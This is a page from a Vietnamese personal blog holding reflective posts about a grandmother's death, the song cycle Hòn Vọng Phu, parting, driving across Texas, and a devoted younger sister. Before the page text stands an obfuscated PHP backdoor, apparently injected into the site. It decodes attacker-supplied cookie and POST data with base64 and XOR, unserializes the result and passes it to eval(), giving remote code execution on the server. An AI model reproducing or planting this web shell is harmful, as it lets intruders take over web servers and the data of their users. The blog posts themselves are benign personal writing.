$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Another Me – Page 3 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Another Me (page 3 of 13)

bà nội

Hồi đó, mỗi khi tôi đọc về những người sống cả đời ở khu phần mộ của tổ tiên, ông bà mình, tôi không hiểu lắm những hành động của họ. Mãi đến gần đây, chính xác hơn là mới cách đây vài phút thôi, tôi mới giật mình, mơ hồ nhận ra một điều gì đó.

Tôi nhớ về ngày trước khi tôi đi, ba tôi chở anh em tôi ra nghĩa trang, đứng trước mộ của bà nội tôi, ông nói:
– Hai con chào bà lần cuối đi. Không biết rồi đến bao giờ mới có thể thăm lại bà thế này
rồi ông ngồi xuống ôm khuôn mặt của bà – được khắc trên nền bia đá lạnh lẽo, mắt đỏ hoe. Tôi thì khóc ròng như một đứa trẻ.

Đôi khi tôi hay ngồi trách tôi, làm sao tôi lại có thể bỏ quá ít thời gian nhớ về bà nội tôi, người rất mực thương yêu tôi; hoặc giả thỉnh thoảng nhớ, thì hình ảnh về bà lại quá phai mờ như thế.

Tôi không mong dùng những câu chữ này, để lưu lại kí ức về bà tôi kẻo ngày nào đó tôi quên mất. Tôi chỉ viết, vì thình lình mọi thứ ập đến quá bất ngờ – như kiểu các nhà văn Nhật Bản hay nói, làm tê liệt mọi giác quan khác của bạn.

Tôi nhớ bà tôi, người có thể kiên nhẫn ngồi xem tôi chơi điện tử bốn nút hàng giờ liền, và luôn thưởng cho tôi vài ngàn tiền tiêu vặt mỗi khi tôi hoàn thành một màn chơi nào đó – kiểu như tôi là đứa trẻ duy nhất trên thế giới này có thể chơi xuất sắc như thế, và điều đó đáng được vinh danh.

Tôi nhớ bà tôi, người mỗi buổi trưa năm tôi học lớp bảy, trước khi tôi đi học, đều làm riêng cho tôi một cái đùi gà chiên bơ, dù tôi ăn hoài, ăn hoài, mà chẳng mập lên được.

Tôi nhớ lúc bà tôi nghiêm nghị quát tôi, khi phát hiện tôi lén xem phim se_x lần đầu tiên vào năm lớp tám.

Tôi nhớ cái mùi thuốc Bắc đến nồng nặc cả căn gác, mùi rau dấp cá đầy tanh hôi mà bà tôi dùng để trị bệnh; tôi nhớ những đêm đang ngủ say, nghe tiếng bà ho gấp gáp, ho đến như xé cổ.

Tôi nhớ vẻ mặt bình thản của bà, khi biết tin mình bị ung thư máu.

Tôi nhớ lại những giọt nước mắt của bà, khi nhìn ba tôi và các cô chú tôi cãi nhau, rồi đánh nhau.

Tôi nhớ những giây phút cuối đời của bà, đau đớn tột cùng bên giường bệnh.

Tôi còn nhớ như in cái buổi sáng tinh mơ, khi tôi đang nằm ngủ thì nhận được tin bà mất, ngay ở căn gác dưới tầng tôi ở. Tôi chạy xuống nhìn bà, đó là lần đầu tiên tôi cảm nhận được mình đã mất, thật sự mất đi một người rất thân yêu. Tôi chỉ đứng đó, nhìn bà, tôi trống rỗng đến mức không nói được gì.

Tôi nhớ khi người ta khiêng quan tài của bà qua ngôi nhà, khi người ta hướng bà về căn nhà mà bà đã ở những ngày cuối cùng, và khẽ nhún người để bà chào ngôi nhà lần cuối.

Tôi nhớ những miếng đất vô hồn, dần phủ lấp lên chiếc quan tài của bà.

Tôi nhớ lời ba tôi dặn chú tôi trước lúc cả nhà tôi đi Mỹ:
– Anh không cần biết chú bận gì! Chú giờ là con trai duy nhất còn ở Việt Nam. Ngày giỗ mẹ, chú về thăm mẹ, giùm anh…

Bà tôi giờ chắc xương cốt đã hóa thành bụi đất. Nấm mộ của bà ắt vẫn luôn có hoa, có nhang mỗi dịp lễ. Chỉ không biết là, đến bao giờ đứa cháu đích tôn của bà mới có dịp lại thắp cho bà một nén hương, để ôm lấy bia mộ bà thật chặt đây.

-Hải .

Hòn Vọng Phu

Điều tôi cho là đáng tiếc duy nhất, trong sự hình thành và phát triển hơn 70 năm của nền nhạc tình Việt Nam, là ở việc có quá ít các “Trường Ca”. Điều này âu cũng dễ hiểu, đa phần các nhạc sĩ ở thời điểm đó toàn tự học sáng tác là chính, ít ai qua bài bản, trường lớp. Thêm nữa, thời buổi loạn li, cảm xúc đến bất chợt rồi đi cũng nhanh, người ta chỉ đủ thời gian để cụ thể hóa những phút thoáng qua đó bằng ca từ trong một ca khúc ngắn…

Cá nhân tôi rất thích nghe các bài Trường Ca, vì đó là những câu chuyện được kể bằng âm nhạc. Bằng những giai điệu, những lời nhạc tài tình, vị nhạc sĩ khi nào đã biến mình thành một ông già trong các câu chuyện cổ xưa, chống gậy đi khắp nơi để kể cho đời nghe biết bao nhiêu điều…

Nhạc Việt có những bài Trường Ca sau, mà tôi rất thích:

  • Thiên Thai – Văn Cao
  • Trường ca Sông Lô – Văn Cao
  • Bình Trị Thiên khói lửa – Nguyễn Văn Thương
  • Du kích Sông Thao – Đỗ Nhuận
  • Con đường Cái Quan – Phạm Duy
  • Hội Trùng Dương – Phạm Đình Chương
  • Đóa hoa vô thường – Trịnh Công Sơn
  • và đặc biệt là Hòn vọng phu – Lê Thương.

    ***

    Tôi nghe Hòn Vọng Phu vào tầm năm học lớp 10. Lúc đó, Internet ở Việt Nam vẫn còn chưa phát triển lắm. Khi đó nhà tôi vẫn còn xài dial-up, nên cũng không có thời gian lê la khắp nơi download nhạc. Nguồn nhạc duy nhất là từ mấy cái đĩa MP3 12ngàn/ đĩa bán đầy ở các hàng đĩa game.

    Đại loại hồi đấy tuổi mới lớn, cũng gọi là có chút gì lẩn thẩn, lơ ngơ, nên ra ngoài hàng đĩa chọn đĩa MP3 của Trịnh Công Sơn (hồi đó chỉ biết mỗi tên ông này). Đĩa lậu nên làm hết sức cẩu thả, tên bài hát sai tới sai lui. Đặc biệt là, bọn nhợn đó nhét luôn cả ba bài “Hòn Vọng Phu” vào, lấy tên nhạc sĩ Trịnh Công Sơn.

    Tôi nghe đi nghe lại cái đĩa đó, nghe tới khi nó trầy đến mức cứ cho vào ổ đĩa là cái máy lại rít lên phì phì phì mới thôi. Bài tôi thích nghe nhất, lạ thay, không phải những bài rất nổi tiếng của nhạc sĩ họ Trịnh (như Diễm Xưa, Hạ Trắng, Em Còn Nhớ Hay Em Đã Quên? – dù tôi vẫn thích), mà là ba bài bị bọn đầu lậu băng đĩa nhét nhầm vào: Hòn Vọng Phu.

    Khổ, xin lỗi nhạc sĩ Lê Thương – một trong những đỉnh cao nhất của dẫy Trường Sơn âm nhạc Việt Nam (theo lời ca sĩ Duy Trác), đến gần hai năm sau tôi mới biết ông là tác giả của trường ca nổi tiếng này.

    ***

    Có người nói đợi chờ là hạnh phúc, người thì bảo mong đợi là khổ đau. Không ai yêu nhau để ly biệt, không một cuộc tình nào muốn đồng hành với biệt ly. Nhưng điều hoàn hảo vốn dĩ chỉ là đặc quyền riêng của Thượng Đế…

    Tôi dần học được cách mỉm cười, khi người ta quên lời hứa sẽ chờ tôi.
    Tôi tưởng đã học được bài học rằng: trên đời này điều ngu ngốc nhất là bắt người khác chờ đợi mình.

    Những năm tháng xuân sắc ấy, trời ơi, lẽ nào tôi có thể ích kỉ đến mức muốn người chờ trong vô vọng…

    …chỉ là có nhiều điều biết không nên làm, mà người ta vẫn làm. Tôi không có ý định biến em thành hòn vọng phu, chỉ mong em, một khoảng thời gian ngắn, chờ tôi, em nhé!

    ***

    Hôm nay ngày Labor Day ở bên này, tôi được nghỉ. Sau khi quét dọn, rửa bát… tôi nằm dài đọc vài cuốn sách và nghe nhạc. Nghe đến bài “Hòn vọng phu” tự nhiên nhớ tới em ghê gớm, thành ra bật dậy và hí hoáy viết.

    Nói ngoài lề xíu về các bản “Hòn vọng phu”. Tôi nghe nhiều version của bài này, có những version cực ghét, có những version thích vừa vừa như của Hoàng Oanh – Duy Khánh, có version khá thích (UnlimiteD Symphony – đánh bài này cùng giàn nhạc giao hưởng thành phố, cực hay, nhưng chỉ tiếc là đánh không trọn bài), và có version rất say mê: Thái Thanh cùng ban hợp ca Thăng Long (Thái Thanh, Thái Hằng, Phạm Đình Chương, Phạm Duy), ban hợp ca nổi tiếng nhất miền Nam trước năm 1975.

    Version tôi đang nghe hiện tại, là version này. Tiếng hát cao vút đẩy thổn thức của Thái Thanh (thuở giọng bà vẫn chưa bị thời gian tàn phá), cùng giọng bè đầy hào hùng, trầm ấm của ban hợp ca Thăng Long.

    Người vọng phu trong lúc gió mưa,
    Bế con đã hoài công để đứng chờ,
    Người chồng đi đã bao năm chưa thấy về
    Đá mòn nhưng hồn chưa mòn giấc mơ

    Chờ anh, em nhé!

    -Hải

    null.

    tôi học được gì từ những biệt ly

    Người ta xưa nay luôn thích nhạc buồn. Phải chăng những giọt nước mắt luôn dễ mang lại rung động hơn những nụ cười?

    Một trong những bài hát nổi tiếng đầu tiên của nền nhạc tình Việt Nam là Biệt Ly của Dzoãn Mẫn. Ngày đó thanh thiếu niên Hà Thành ai cũng đua nhau hát bài này.
    Không phải tất cả họ đều từng trải qua biệt ly.

    Người ta nhìn biệt ly theo những cách hoàn toàn khác nhau. Người ác tâm thì nhìn vào biệt ly để tự hão rằng mình may mắn hơn người khác. Đó âu cũng là một cách để che giấu nỗi lo lắng khi nghĩ về chính bản thân mình, chính cuộc tình của mình.

    Lại có những người, như tôi, học được nhiều điều khác từ biệt ly…

    ***

    Tôi khi chat với một cô bé, nghe cô ấy đang chán nản về quá trình tìm việc của mình, tôi có trích dẫn một câu đại loại trong một bài hát nổi tiếng của Aerosmith: Life is a journey, not a destination để tặng cô.

    Đích đến của cuộc đời, nào ai biết? Con người ta sống chỉ có vài chục năm, sau đó có luân hồi, có kiếp sau hay mãi tan thành một hạt bụi, hòa mình vào hư vô thì vĩnh viễn là câu hỏi không có lời trả lời.

    Cuộc đời này là một hành trình ngắn ngủi, nhưng tình yêu thì không bao giờ là ngắn ngủi.

    Năm 16 tuổi, tôi tình cờ nghe Bên cầu biên giới của nhạc sĩ Phạm Duy. Sau này khi trả lời phỏng vấn về bài hát này, ông có nói đại loại: Biên giới lớn nhất chính là biên giới trong lòng người…

    Con người ta đi trong cuộc đời mình, đi qua những con đường tình khác nhau, bằng nhiều cách khác nhau. Cái cách người ta yêu, tuy không nhiều, nhưng thể hiện cách mà người ta nhìn cuộc đời.

    Tôi chọn người yêu, không chọn cách thức yêu.

    ***

    Từ đau khổ của những biệt ly – đó có thể là sinh tử biệt ly như của một cô bé mà tôi từng theo đuổi, đó có thể là tình cảm suốt bảy năm trời đằng đẵng cũng đi về hai chữ biệt ly như chuyện của một bé mà tôi đã quen từ lâu; hoặc giả đó là biệt ly mà chính tôi đã trải qua, tôi học được cách không bao giờ lo nghĩ về biệt ly, chỉ toàn tâm toàn ý cho hiện tại trước mắt.

    Đừng bao giờ e sợ biệt ly. Người ta chỉ biệt ly, khi lòng người ta thay đổi…

    p/s: image from http://www.lhemon.com/.

    Xanh Dương và tôi

    Pantera – con khủng long của dòng Thrash Metal cuốn hút tôi bằng những giai điệu đầy mạnh mẽ, những cú riff guitar chắc nịch của Dimebag và giọng hát điên cuồng đầy phẫn nộ của Phil.

    Khi tôi đang bị những phút giây buồn bã nhất nhấn chìm, thì Cemetery Gate của Pantera là bài nhạc mà tôi để chế độ repeat cả đêm.
    Khi tôi lái xe phóng vù vù qua những con đường thẳng tắp, qua những cánh đồng cháy vàng rực đặc trưng của Texas, thì bài tôi hay mở là Cowboy from hell.
    Nhưng trên tất cả, tôi thích Walk của Pantera nhất.

    You can’t be something you’re not
    Be yourself, by yourself

    ***

    Phim Tham vọng biển cả của Hàn Quốc có câu:

    Kí ức thì không dễ gì phai nhoà, còn tình cảm thì quên rất nhanh…

    Có những thứ không thể quên, có tốn cả cuộc đời cũng không thể quên. Nhưng không quên và luôn nhớ là hai khái niệm cách xa nhau hàng ngàn năm ánh sáng.

    Khi tôi bảo hiện tại, tôi không nhớ gì về những nỗi đau trong quá khứ thì nhiều người không tin, nhưng thật sự là thế. Tin tôi đi, tôi không tìm ra lí do nào để nói dối các bạn – ít ra là trên blog này.

    ***

    Be yourself, by yourself…

    Tôi không phải là người đa nhân cách. Tôi là một tôi duy nhất, chỉ có thể hiện ở nhiều mặt khác nhau: tán gái như điên trên Facebook, chửi gái liên hồi ở YM, và một tôi ở Xanh Dương này.

    Nhiều người đánh đồng Xanh Dương và người cũ của tôi. Hương gọi tôi là Blue của em, không có nghĩa là tôi chưa từng là tôi trước khi cô ấy gọi tôi như thế. Một phần trong tôi vẫn luôn là tôi, từ lúc tôi có nhận thức, chỉ có cái phần đó nó được gọi là Blue, từ khi tôi quen Hương.

    Chia tay Hương, không có nghĩa tôi không còn là tôi. Khi một phần trong tôi vẫn còn là Xanh Dương, không có nghĩa là tôi vẫn còn đau khổ vì Hương.

    ***

    Cái chuyện đơn giản thế, sao nhiều người lại thấy khó hiểu?

    -Blue.

    vừa đi đường vừa kể chuyện…

    những con đường xuyên bang Texas gây ấn tượng với mình bởi màu xanh ngát bạt ngàn của cây cối, những cánh đồng cỏ một màu vàng cháy khét, còn có bầu trời cao và xanh đến vô tận, mây trắng trôi lững lờ và cái nắng buổi chiều vàng nhạt chiếu xiên xiên qua cánh cửa xe…

    mỗi lần lái 250 mi ~ 400 km về nhà, đi đường vừa nốc cafe vừa nghe metal cũng chán, mới vừa lái vừa chụp hình

    đừng ai hỏi sao hình xấu thế, lái xe ở tốc độ 78 mph (125 km/h) thì chụp được hình đã là hay rồi

    link Facebook: http://www.facebook.com/album.php?aid=2065256&id=1550333357.

    em gái

    null

    Anh đi làm xa, hai tuần lái xe về một lần. Tính ra mới đi làm được tầm ba tháng hơn xíu, mà đã lái tầm 6200 miles, qui ra km cũng là 11.5 ngàn km rồi. Ngẫm lại mà giật cả mình!

    Mỗi lần lái xe về nhà, nhiều bạn hay hỏi anh làm gì ở nhà. Thật ra anh lái xe về nhà cũng chỉ cả ngày nằm dài ở cái sofa, chả đi đâu chơi. Về nhà lại mệt nhiều thứ hơn, có bao nhiêu điều cần giải quyết, gọi chỗ này một chút, gọi chỗ kia một chút, điền giấy tờ này, giấy tờ kia cho ba mẹ.

    Mệt hơn nữa là em gái anh toàn đem mấy bài toán của nó ra hỏi anh.

    ***

    Em gái anh thua anh hai tuổi. Các bạn trai khi đong gái hay kể những câu chuyện đại loại như:

    Khi tớ hai tuổi, tớ lại gần và sờ bụng mẹ tớ, tớ hỏi:
    – Mẹ ơi! Con sắp có em à?
    rồi nào là:
    – Con sẽ thay mẹ chăm sóc em nhé…

    nhằm mục đích khiến cho loài gái nghĩ rằng: ồ, anh ấy thật là biết thương yêu em gái, tâm hồn tinh tế thế, ắt sau này sẽ yêu thương mình lắm đây!

    Anh thật, toàn phường chém gió thôi.

    Anh có em gái rồi anh biết. Tự nhiên khi có nhận thức, là đã quen với việc có một đứa em, xem đó như việc đương nhiên.

    ***

    Đôi khi nhìn những đứa em họ, con của các dì cậu anh, anh cũng thấy buồn khi anh em chúng ít chơi chung với nhau. Thời buổi hiện nay, trẻ con có đủ mọi thứ. Trẻ trai thì đã biết ngồi máy vi tính chơi đảo hải tặc, hay thậm chí cầm XBox 360 chơi bắn súng ì xèo. Các bé gái thì ngập lặn trong cơ man nào là búp bê, gấu bông.

    Hồi anh còn nhỏ, trẻ con miền quê chỉ có những trò như năm mười, keo, keng, nhảy lò cò, đánh trận giả – những trò chơi mà tất cả bọn trẻ trai hay gái đều hào hứng tham gia.

    Chính vì thế, tuổi thơ anh luôn gắn liền với việc có một đứa em đi bên cạnh.

    Bọn anh chơi nhảy lò cò chung với nhau, so đo nhau khi chân đứa kia thậm chí chỉ giẫm lên đường biên ô lò cò vài mi-li-mét. Bọn anh tị nạnh nhau khi cho rằng đứa kia chưa đếm đến 100 đã ti hí mắt ra mà dòm trong trò chơi năm mười (trốn tìm).

    Anh và em anh cũng từng chụm đầu lại thổi bong bóng xà phòng làm bằng cách giã nát hoa râm bụt, rồi trộn với nước. Cũng từng cùng nhau đứa bẻ cây khoai mì để làm đạn bắn, đứa nhặt đá ném qua lại khi chiến tranh với bọn trẻ con hàng xóm trước nhà. Thậm chí, mấy lần anh bẻ hàng rào ở nhà dòng để chui về nhà, cũng có em anh đứng cạnh cảnh giới.

    ***

    Có một chuyện mà anh còn nhớ, đó là năm lớp 4, lớp anh tổ chức đi chơi Suối Tiên. Đối với một đứa bé quanh năm lớn lên ở quê như bọn anh, thì được lên Sài Gòn là thứ gì đó lớn lao. Nó cũng xin đi chung với anh. Trước khi đi, mẹ dúi cho hai đứa ít tiền…

    Lên Suối Tiên rồi, bọn anh mới biết số tiền đó là quá ít.

    Anh quên quá nhiều, anh không nhớ đó là trò chơi nào, chỉ biết đó là trò mà anh nhìn rất thích. Anh và nó cứ đứng tần ngần trước trò chơi đó, nhìn đám bạn anh lần lượt chơi. Điều khiến anh không quên được, là nó đưa tiền của nó cho anh, bảo: anh đi chơi đi, em đứng dưới được rồi. Đến giờ thật tình anh không thể nhớ mình có chơi trò đó không, nhưng chi tiết đó, anh nhớ rất kĩ.

    ***

    Nếu trên thế giới chỉ còn sót lại hai người luôn tự hào về anh dù bất cứ chuyện gì xảy ra, thì anh biết đó sẽ là mẹ anh và em gái anh.

    Khi bắt đầu lớn lên, em anh đã xem việc anh học giỏi như là điều dĩ nhiên.

    Anh nhớ hồi nhà anh mới từ quê lên Sài Gòn xa hoa, hiện đại, một trong những việc đầu tiên mà ba mẹ anh muốn làm là cho anh đi học vi tính, để cho bằng bạn bằng bè. Sau đó là tới Anh Văn. Ba mẹ muốn cho em gái anh đi học trước, vì đã tốn kha khá tiền cho anh học vi tính rồi. Anh còn nhớ, em anh khi đó tuy còn rất nhỏ, nhưng đã nói: ba mẹ cho anh Hải đi học đi, anh Hải học giỏi hơn con mà.

    Anh học hội Việt Mỹ, khi đó đối với một gia đình mới từ quê lên, thu nhập chưa có, thì cũng gọi là số tiền lớn.

    Ba mẹ anh không thiên vị, sau này cũng muốn cho nó đi học thêm nhiều chỗ hay và tốt, nhưng lần nào nó cũng nói: nhường cho anh Hải học trước.

    ***

    Khi anh và nó lớn hơn chút, thì nó nghiễm nhiên quen với chuyện anh cần nhiều thứ hơn. Khi mẹ cho hai đứa tiền tuần, em anh nói với mẹ: con không cần nhiều tiền thế đâu! và nó chấp nhận việc tiền tuần của nó thua anh gần một nửa mà không so bì gì.

    Anh không thích đi mua sắm, hồi anh còn ở Việt Nam, đồ anh toàn nó và mẹ đi siêu thị mua sắm. Và gần như lúc nào cũng chỉ là anh có đồ mới. Mẹ và em gái anh rất ít mua đồ. Anh thì mỗi lần nhận đồ mới chỉ cằn nhằn qua loa: con có cần đồ mới đâu mà mẹ mua, rồi lại đâu vào đấy.

    ***

    Anh bắt đầu quen bạn gái, anh quen dần với việc vào những quán cafe đắt tiền (so với sinh viên nghèo như anh hồi đó), những rạp chiếu phim, những tiệm ăn sang trọng – vả cả những nhà nghỉ sau đó.

    Có lần, đi chơi với bạn gái về (cafe – xem phim – cafe – nhà nghỉ – trình tự là thế nếu anh nhớ không lầm), vừa dắt xe vào nhà, thấy nó ngượng ngùng xin hai chục ngàn đi ăn ốc với bạn mà muốn ứa nước mắt ra.

    Khi bạn gái cũ của anh làm anh đau, phản bội niềm tin của anh, nó chỉ nói: em ghét con đó, vì nó làm anh buồn…

    ***

    Đến lúc qua đây, khi mới qua, ba mẹ muốn mua laptop cho hai đứa. Anh mua máy trước, nó mua máy sau. Nó chọn cái máy giá chỉ bằng một nửa máy anh, xấu hơn nhiều, và ngồi cạnh anh chơi game mà không hề có chút ghen tị gì.

    Khi anh còn chưa kiếm được việc làm, nó đi học đại học. Nó cứ hằng mỗi sáng gọi anh dậy, chở nó tới trường, và ngồi trong thư viện chờ nó học xong.

    Có lẽ, em anh đã hơn 20 tuổi, nhưng nó vẫn luôn muốn ở cạnh anh như thuở nhỏ.

    ***

    Anh đi làm xa, anh mua xe mới. Nó chạy lại cái xe cũ mà hồi đó anh chạy.

    Mỗi lần anh đi về, anh chở nó đi đâu, nghe nó khen: xe đẹp quá, sau này ước gì em cũng có tiền mua một chiếc.

    Anh với cái kính đen, đeo vội vào…

    ***

    Anh đi làm, lãnh tháng lương đầu tiên. Anh hứa mua tặng gái đủ món quà. Bỗng tự nhiên, mẹ gọi lên nói rất nhỏ và gấp gáp: mẹ đang cùng em con đi shopping. Nó nhìn thấy đồ mắc quá không muốn mua. Con cứ nói là con cho nó tiền mua nhé, rồi mẹ trả tiền con sau

    Hôm đó em anh mua được vài bộ váy, vài cái áo đẹp…

    Có lần anh về nhà, thấy cửa sổ YM nó đang chat dở bỏ đó đi nấu cơm. Nó chat với bạn nó, nó khoe về anh rất nhiều, từ việc anh đi làm ngon lành, tới việc anh mua tặng nó vài bộ quần áo.

    Anh xem mà mắt đỏ hoe.

    ***

    Em anh nó thích nghe nhạc, mà cả anh và nó đều không có cái máy nghe nhạc nào thật sự. À, dì của anh có cho cái iPod 4Gb mà dì không xài. Nó chỉ nói anh: anh đi đường xa cần nghe nhạc, anh lấy xài đi.

    Bữa anh thấy trên mạng bán cái máy nghe nhạc kiểu giống iPod touch, nhưng của công ty khác, đang giảm giá từ 250$ xuống còn 45$. Anh mới buzz nó ngoài YM và hỏi:
    – Mày thích máy nghe nhạc không, tao mua cho?
    Câu đầu tiên nó hỏi vẫn là:
    – Mắc không anh.
    Anh mới bảo nó:
    – Có giảm giá, không mắc lắm, mày thích không thôi?
    Nó suy nghĩ hồi rồi reply lại:
    – Hihi cám ơn anh.

    Anh định order rồi, mà thấy người ta review tệ quá (tiền nào của đấy thôi) mới nói nó:
    – Thôi máy này dở lắm, để lúc khác đi.
    Nó trả lời:
    – Ok! Không sao đâu anh.

    Ai anh không biết, chứ em anh, anh chắc chắn là nó không nghĩ nhiều. Và vì thế, anh càng thương nó hơn…

    Hôm rồi anh về, anh chở nó đi tới chỗ bạn trên xe của anh, thấy nó hí hoáy chọn bài trên cái iPod cũ kĩ của anh, lại cảm thấy nhói lòng quá…

    ***

    Lần nào anh về, nó cũng đều muốn anh ngồi giải toán ở trường với nó. Nó hỏi anh đủ điều dù biết những cái đạo hàm, cực trị… đó anh chả còn nhớ gì. Vậy mà bài nào nó cũng cứ bắt anh ngồi đó, hỏi anh, và rồi nó tự giải…

    Lần nào anh về, nó đều nói anh dẫn nó đi uống Starbucks và đi ra rạp xem phim – dù anh biết thừa số lượng cafe nó uống trong hơn hai chục năm nó sống, đếm không quá đầu ngón tay, và số lần đi rạp xem phim cũng vậy.

    Anh chỉ nằm dài đó, ngáp, chơi game và đáp: Tao lười!

    Anh than anh lái xe mệt, nó lại ngồi đấm lưng cho anh, ngay sau đó, mà không hề buồn bã trách móc gì.

    Tệ thật!

    090810,
    -Hải .

    kiếp sau

    Nền nhạc trữ tình Việt Nam ngày xưa có nhiều nhạc sĩ rất hay. Trong đó có hai ông tên là Phạm Duy và Ngọc Bích.

    Ông Phạm Duy năm nay đã gần 90 tuổi, ổng sáng tác nhạc hay quên cả sầu. Phạm Duy sáng tác nhiều lắm, chuyện, ổng sáng tác từ hồi tầm 20 tuổi cho tới tận 90 tuổi mà. Trong số các bài của Phạm Duy, anh thích nhất “lá diêu bông”, và hay nghe nhất là “Kiếp nào có yêu nhau”.

    “Kiếp nào có yêu nhau” cũng được kha khá ca sĩ trình bày. Có thể liệt kê ở đây: Khánh Hà – Tuấn Ngọc, Thái Thanh, Lệ Thu… gần đây thì có anh Đức Tuấn, chị Thiên Kim, à còn chị Ngọc Hạ cũng hát. Version anh thích nhất là version của Ngọc Hạ. Nghe chị này hát trong Paris By Night 98, hay quên sầu (hát chung với Trần Thái Hòa).

    Bài chị ấy hát đây: Kiếp nào có yêu nhau – Ngọc Hạ

    À đại loại cái bài “Kiếp nào có yêu nhau”, nó có câu:

    Kiếp nào có yêu nhau
    Thì xin tìm đến mai sau

    ***

    Ông Ngọc Bích thì không nổi tiếng bằng ông Phạm Duy, thậm chí không nổi tiếng bằng nhiều ông nhạc sĩ khác. Bài của ổng cũng có khá nhiều, mà toàn là bài anh nghe vài lần là chán.

    Bài được biết đến nhiều nhất của Ngọc Bích, có lẽ là bài “Mộng chiều xuân” và bài “Trở về bến mơ”. Bài “Trở về bến mơ” hồi trước năm 75 khá nổi tiếng, bài này trong các băng nhạc cũ (Thanh Thúy, Phạm Mạnh Cương) từng được Elvis Phương, Sĩ Phú, hay Lệ Thu thể hiện. Cô Lệ Thu thể hiện bài này khá đạt. Nhưng anh thích version Tuấn Ngọc hát hơn. Bài này đây Trở về bến mơ – Tuấn Ngọc

    Bài “Trở về bến mơ”, nghe Tuấn Ngọc hát tới câu

    Hay đớn đau vì câu chờ kiếp sau…

    mới thấy hai chữ “kiếp sau”, nó đau thế nào

    ***

    Đại Diễn Thần Quân là một ông khác. Ông này chả liên quan gì tới hai ông Phạm Duy, Ngọc Bích, hay rộng hơn là các nhạc sĩ Việt Nam. Ông này thậm chí còn không có thật nữa. Ông này là một nhân vật phụ trong bộ tiên hiệp “Phàm nhân tu tiên” của Tàu Khựa. Ổng có một câu rất hay:

    Nhưng đối với lão phu mà nói, cho dù là có thể có kiếp sau nhưng không có trí nhớ tình cảm kiếp này thì đó có còn là ta không? Căn bản là một người khác hoàn toàn xa lạ mà thôi…

    ***

    Này em ơi, kiếp này không yêu nhau thì thôi, còn hẹn kiếp sau nữa, làm gì?

    -H

    Có không cái kiếp luân hồi?
Kiếp sau có muốn làm người lại chăng?.

    © 2024 B.l.u.e. All rights reserved.

    Theme by Anders Norén.